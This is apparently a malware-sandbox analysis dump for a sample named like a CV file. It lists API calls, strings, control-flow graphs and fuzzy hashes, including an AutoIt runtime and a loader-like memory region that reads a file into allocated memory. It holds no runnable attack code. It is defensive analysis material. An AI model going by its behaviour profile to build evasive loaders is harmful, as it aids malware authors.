                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID: @$ D$ D$ D
                                                                                        • API String ID: 3728558374-1500609730
                                                                                        • Opcode ID: 2e45ab79a8e739c0bf65f45e095703b79a4bf97cdbcb91422f625bb27c1757a3
                                                                                        • Instruction ID: c65461fe19937bf16c5d7e36cefdce244e1557309ffc649e39f9411162d93035
                                                                                        • Opcode Fuzzy Hash: 2e45ab79a8e739c0bf65f45e095703b79a4bf97cdbcb91422f625bb27c1757a3
                                                                                        • Instruction Fuzzy Hash: 3572AE75D04209AFCF16EF94C481EBEB7B5FF48300F15805AE90AAB251D771AE46CB91
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,003F2F49), ref: 003C6CB9
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003C6CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C6CDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: f75de7e3120863089cdfc42c03c720d37d5f73050922c4c2660a8e698c479def
                                                                                        • Instruction ID: 683fdcfff2974e7687cce956d2175f5b5d6facdc10eb9ea9373dbd5e0ec79a48
                                                                                        • Opcode Fuzzy Hash: f75de7e3120863089cdfc42c03c720d37d5f73050922c4c2660a8e698c479def
                                                                                        • Instruction Fuzzy Hash: 11E0D831C1041057C2146778ED0E8EA376CDE05339F104729F471D11D0EF74DD0456D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: D
                                                                                        • API String ID: 3964851224-275895
                                                                                        • Opcode ID: ca5c11dd6a10d24346ea7b4d50cbb2c584ec71e4c5899ec98adaf3be1ed8ac8c
                                                                                        • Instruction ID: e43c20d8aa620abdfe422b9edad5ebfd446bd56556d9ab7f8b8b31ba4d5662ca
                                                                                        • Opcode Fuzzy Hash: ca5c11dd6a10d24346ea7b4d50cbb2c584ec71e4c5899ec98adaf3be1ed8ac8c
                                                                                        • Instruction Fuzzy Hash: FC927CB06083419FDB26DF18C480B6AB7E5FF89304F15885EE98A8B362D771ED45CB52
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038E959
                                                                                        • timeGetTime.WINMM ref: 0038EBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038ED2E
                                                                                        • TranslateMessage.USER32(?), ref: 0038ED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 0038ED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 0038ED79
                                                                                        • DestroyWindow.USER32 ref: 0038ED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038ED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 003F5270
                                                                                        • TranslateMessage.USER32(?), ref: 003F59F7
                                                                                        • DispatchMessageW.USER32(?), ref: 003F5A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003F5A19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        • Opcode ID: a31b945355af6bd996a8072241db9ebbe3c641d2531f411a3fdfcd8d998eec99
                                                                                        • Instruction ID: ee060c9802133ab1efc6e9e37c362741ebcb5f5f367b1ca44797a3c7e895ff67
                                                                                        • Opcode Fuzzy Hash: a31b945355af6bd996a8072241db9ebbe3c641d2531f411a3fdfcd8d998eec99
                                                                                        • Instruction Fuzzy Hash: 0B62E270508344DFDB26EF24C885BAA77E4BF45304F1449BDFA4A8B292DBB4D848CB52
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 003B5EC3
                                                                                        • ___createFile.LIBCMT ref: 003B5F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003B5F2D
                                                                                        • __dosmaperr.LIBCMT ref: 003B5F34
                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 003B5F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003B5F6A
                                                                                        • __dosmaperr.LIBCMT ref: 003B5F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003B5F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 003B5FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B6016
                                                                                        • __close_nolock.LIBCMT ref: 003B603C
                                                                                        • __chsize_nolock.LIBCMT ref: 003B606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B6176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B618B
                                                                                        • __close_nolock.LIBCMT ref: 003B61EB
                                                                                          • Part of subcall function 003AEA9C: CloseHandle.KERNELBASE(00000000,0042EEF4,00000000,?,003B6041,0042EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003AEAEC
                                                                                          • Part of subcall function 003AEA9C: GetLastError.KERNEL32(?,003B6041,0042EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003AEAF6
                                                                                          • Part of subcall function 003AEA9C: __free_osfhnd.LIBCMT ref: 003AEB03
                                                                                          • Part of subcall function 003AEA9C: __dosmaperr.LIBCMT ref: 003AEB25
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003B6342
                                                                                        • ___createFile.LIBCMT ref: 003B6361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003B636E
                                                                                        • __dosmaperr.LIBCMT ref: 003B6375
                                                                                        • __free_osfhnd.LIBCMT ref: 003B6395
                                                                                        • __invoke_watson.LIBCMT ref: 003B63C3
                                                                                        • __wsopen_helper.LIBCMT ref: 003B63DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989
                                                                                        • Opcode ID: bb4e74130f68f1428b9926e74b5e7d8e48ad706c2373c2b980318f275c41617a
                                                                                        • Instruction ID: 2c00da54ba79d8693d423f12d7fce246618f8f978ab0400d4a1f8f4ae3c94a62
                                                                                        • Opcode Fuzzy Hash: bb4e74130f68f1428b9926e74b5e7d8e48ad706c2373c2b980318f275c41617a
                                                                                        • Instruction Fuzzy Hash: 0A223771D046059FEF2B9F68CC86BFD7B65EB05318F294228E6219BAD2C3398D40C751

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 003CFA96
                                                                                        • _wcschr.LIBCMT ref: 003CFAA4
                                                                                        • _wcscpy.LIBCMT ref: 003CFABB
                                                                                        • _wcscat.LIBCMT ref: 003CFACA
                                                                                        • _wcscat.LIBCMT ref: 003CFAE8
                                                                                        • _wcscpy.LIBCMT ref: 003CFB09
                                                                                        • __wsplitpath.LIBCMT ref: 003CFBE6
                                                                                        • _wcscpy.LIBCMT ref: 003CFC0B
                                                                                        • _wcscpy.LIBCMT ref: 003CFC1D
                                                                                        • _wcscpy.LIBCMT ref: 003CFC32
                                                                                        • _wcscat.LIBCMT ref: 003CFC47
                                                                                        • _wcscat.LIBCMT ref: 003CFC59
                                                                                        • _wcscat.LIBCMT ref: 003CFC6E
                                                                                          • Part of subcall function 003CBFA4: _wcscmp.LIBCMT ref: 003CC03E
                                                                                          • Part of subcall function 003CBFA4: __wsplitpath.LIBCMT ref: 003CC083
                                                                                          • Part of subcall function 003CBFA4: _wcscpy.LIBCMT ref: 003CC096
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0A9
                                                                                          • Part of subcall function 003CBFA4: __wsplitpath.LIBCMT ref: 003CC0CE
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0E4
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$t2C
                                                                                        • API String ID: 2955681530-1673348803
                                                                                        • Opcode ID: fb09e844e7c336bfdb3dc15d3a1d88a9b8dda2ac14115f7ab818dccf96e4c483
                                                                                        • Instruction ID: e1183d384589cc31ef59cf055f5f7d2f4f432bcfb1a4d4fbf40a9f2854ca23b6
                                                                                        • Opcode Fuzzy Hash: fb09e844e7c336bfdb3dc15d3a1d88a9b8dda2ac14115f7ab818dccf96e4c483
                                                                                        • Instruction Fuzzy Hash: FA919172504705AFCB16EB54C851F9AB3E9FF48310F04886DF9499B292DB35EE44CB91

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00383F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00383FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00383FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00383FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00384004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00384013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: b2135169496edcf71f86f17e9c33edc42eded5879fd178af744e8bae808539c4
                                                                                        • Instruction ID: b0e8152f72bb77345352e97b01f285b1461b72148c2c2b60b535605f6d9f2407
                                                                                        • Opcode Fuzzy Hash: b2135169496edcf71f86f17e9c33edc42eded5879fd178af744e8bae808539c4
                                                                                        • Instruction Fuzzy Hash: AD21C7B9D00318AFDB00DFE4E989BCDBBB4FB09714F01422AF615B62A0D7B545848F99

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 003CBDB4: __time64.LIBCMT ref: 003CBDBE
                                                                                          • Part of subcall function 00384517: _fseek.LIBCMT ref: 0038452F
                                                                                        • __wsplitpath.LIBCMT ref: 003CC083
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscpy.LIBCMT ref: 003CC096
                                                                                        • _wcscat.LIBCMT ref: 003CC0A9
                                                                                        • __wsplitpath.LIBCMT ref: 003CC0CE
                                                                                        • _wcscat.LIBCMT ref: 003CC0E4
                                                                                        • _wcscat.LIBCMT ref: 003CC0F7
                                                                                        • _wcscmp.LIBCMT ref: 003CC03E
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC65D
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003CC2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003CC338
                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003CC34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003CC35F
                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003CC371
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2378138488-0
                                                                                        • Opcode ID: eeff526ecff67eda39daa9aaa2ca1666de8fac4a1e0ca102b0a32a97babfdd03
                                                                                        • Instruction ID: 46cc90500c143c3a1874bbcce9e7741a45e5c6e16734082457e5bd00c2da8416
                                                                                        • Opcode Fuzzy Hash: eeff526ecff67eda39daa9aaa2ca1666de8fac4a1e0ca102b0a32a97babfdd03
                                                                                        • Instruction Fuzzy Hash: 94C108B1D10219AADF12DF95CC81EDEBBBDEF49310F0040AAF609EA151DB719E848F65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 958 383742-383762 960 3837c2-3837c4 958->960 961 383764-383767 958->961 960->961 964 3837c6 960->964 962 3837c8 961->962 963 383769-383770 961->963 968 3837ce-3837d1 962->968 969 3f1e00-3f1e2e call 382ff6 call 39e312 962->969 965 38382c-383834 PostQuitMessage 963->965 966 383776-38377b 963->966 967 3837ab-3837b3 DefWindowProcW 964->967 973 3837f2-3837f4 965->973 971 3f1e88-3f1e9c call 3c4ddd 966->971 972 383781-383783 966->972 974 3837b9-3837bf 967->974 975 3837d3-3837d4 968->975 976 3837f6-38381d SetTimer RegisterWindowMessageW 968->976 1003 3f1e33-3f1e3a 969->1003 971->973 997 3f1ea2 971->997 978 383789-38378e 972->978 979 383836-383840 call 39eb83 972->979 973->974 982 3837da-3837ed KillTimer call 383847 call 38390f 975->982 983 3f1da3-3f1da6 975->983 976->973 980 38381f-38382a CreatePopupMenu 976->980 985 3f1e6d-3f1e74 978->985 986 383794-383799 978->986 998 383845 979->998 980->973 982->973 989 3f1ddc-3f1dfb MoveWindow 983->989 990 3f1da8-3f1daa 983->990 985->967 993 3f1e7a-3f1e83 call 3ba5f3 985->993 995 3f1e58-3f1e68 call 3c55bd 986->995 996 38379f-3837a5 986->996 989->973 999 3f1dac-3f1daf 990->999 1000 3f1dcb-3f1dd7 SetFocus 990->1000 993->967 995->973 996->967 996->1003 997->967 998->973 999->996 1004 3f1db5-3f1dc6 call 382ff6 999->1004 1000->973 1003->967 1007 3f1e40-3f1e53 call 383847 call 384ffc 1003->1007 1004->973 1007->967
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 003837B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 003837DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00383800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0038380B
                                                                                        • CreatePopupMenu.USER32 ref: 0038381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 0038382E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: b35e1bfc1acb9c5d26a708896ac233208cadea66ed2cf55711671f6bce3eadb5
                                                                                        • Instruction ID: cf1c9962def10ee0c91bd8ca9f31f5bf552b15f61f2574c76b1026a8e45b186c
                                                                                        • Opcode Fuzzy Hash: b35e1bfc1acb9c5d26a708896ac233208cadea66ed2cf55711671f6bce3eadb5
                                                                                        • Instruction Fuzzy Hash: FA4177F4100349ABEB177FA8ED4AF7A3A59F701B00F000175FA02D66A1CB79DE809329

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00383E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00383E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00383E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00383EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00383EC2
                                                                                          • Part of subcall function 00384024: LoadImageW.USER32(00380000,00000063,00000001,00000010,00000010,00000000), ref: 00384048
                                                                                        • RegisterClassExW.USER32(?), ref: 00383F30
                                                                                          • Part of subcall function 00383F53: GetSysColorBrush.USER32(0000000F), ref: 00383F86
                                                                                          • Part of subcall function 00383F53: RegisterClassExW.USER32(00000030), ref: 00383FB0
                                                                                          • Part of subcall function 00383F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383FC1
                                                                                          • Part of subcall function 00383F53: InitCommonControlsEx.COMCTL32(?), ref: 00383FDE
                                                                                          • Part of subcall function 00383F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00383FEE
                                                                                          • Part of subcall function 00383F53: LoadIconW.USER32(000000A9), ref: 00384004
                                                                                          • Part of subcall function 00383F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00384013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 003a5b9bb10e9c263afc52fdb93a6fff57c01ffc607c70ca14d89bad3ab4727a
                                                                                        • Instruction ID: 61ebb630dc9ea168a75535fce7712e35e5022d9072846d4182bf1f887574375b
                                                                                        • Opcode Fuzzy Hash: 003a5b9bb10e9c263afc52fdb93a6fff57c01ffc607c70ca14d89bad3ab4727a
                                                                                        • Instruction Fuzzy Hash: 0F2148B8D00314ABCB11DFA9ED49A9ABBF5EB4D710F00423AE204A72B1D37546848B99

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1022 19fc608-19fc6b6 call 19f9ff8 1025 19fc6bd-19fc6e3 call 19fd518 CreateFileW 1022->1025 1028 19fc6ea-19fc6fa 1025->1028 1029 19fc6e5 1025->1029 1034 19fc6fc 1028->1034 1035 19fc701-19fc71b VirtualAlloc 1028->1035 1030 19fc835-19fc839 1029->1030 1032 19fc87b-19fc87e 1030->1032 1033 19fc83b-19fc83f 1030->1033 1036 19fc881-19fc888 1032->1036 1037 19fc84b-19fc84f 1033->1037 1038 19fc841-19fc844 1033->1038 1034->1030 1041 19fc71d 1035->1041 1042 19fc722-19fc739 ReadFile 1035->1042 1043 19fc8dd-19fc8f2 1036->1043 1044 19fc88a-19fc895 1036->1044 1039 19fc85f-19fc863 1037->1039 1040 19fc851-19fc85b 1037->1040 1038->1037 1047 19fc865-19fc86f 1039->1047 1048 19fc873 1039->1048 1040->1039 1041->1030 1049 19fc73b 1042->1049 1050 19fc740-19fc780 VirtualAlloc 1042->1050 1045 19fc8f4-19fc8ff VirtualFree 1043->1045 1046 19fc902-19fc90a 1043->1046 1051 19fc899-19fc8a5 1044->1051 1052 19fc897 1044->1052 1045->1046 1047->1048 1048->1032 1049->1030 1053 19fc787-19fc7a2 call 19fd768 1050->1053 1054 19fc782 1050->1054 1055 19fc8b9-19fc8c5 1051->1055 1056 19fc8a7-19fc8b7 1051->1056 1052->1043 1062 19fc7ad-19fc7b7 1053->1062 1054->1030 1059 19fc8c7-19fc8d0 1055->1059 1060 19fc8d2-19fc8d8 1055->1060 1058 19fc8db 1056->1058 1058->1036 1059->1058 1060->1058 1063 19fc7ea-19fc7fe call 19fd578 1062->1063 1064 19fc7b9-19fc7e8 call 19fd768 1062->1064 1070 19fc802-19fc806 1063->1070 1071 19fc800 1063->1071 1064->1062 1072 19fc808-19fc80c CloseHandle 1070->1072 1073 19fc812-19fc816 1070->1073 1071->1030 1072->1073 1074 19fc818-19fc823 VirtualFree 1073->1074 1075 19fc826-19fc82f 1073->1075 1074->1075 1075->1025 1075->1030
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 019FC6D9
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 019FC8FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                        • Instruction ID: e139536adf7dc8f8b8ac0a3fed69f2571d04427afd754a96d7175ad3a3e02cbc
                                                                                        • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
